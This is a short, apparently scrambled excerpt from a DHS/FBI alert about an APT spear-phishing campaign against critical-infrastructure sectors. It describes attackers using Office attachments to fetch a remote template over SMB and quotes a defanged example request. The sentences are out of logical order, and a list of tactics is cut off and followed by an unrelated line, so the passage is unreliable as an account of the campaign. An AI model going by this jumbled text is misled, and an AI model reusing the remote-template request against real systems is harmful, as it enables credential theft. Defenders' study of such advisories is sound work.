Historically, threat actors have also targeted other critical infrastructure sectors with similar campaigns.
Analysis by DHS, FBI, and trusted partners has identified distinct indicators and behaviors related to this activity.
This alert provides information on advanced persistent threat (APT) actions targeting government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors. This report contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by APT actors on compromised victims’ networks.Stage 2: Weaponization Throughout the spear-phishing campaign, threat actors used email attachments to leverage legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block (SMB) protocol.(An example of this request is: file[:]///Normal.dotm).The threat actor uses the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims.The ultimate objective of the cyber threat actors is to compromise organizational networks, which are referred throughout this alert as “intended target.”The threat actors in this campaign employed a variety of TTPs, including: DHS leveraged the Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity.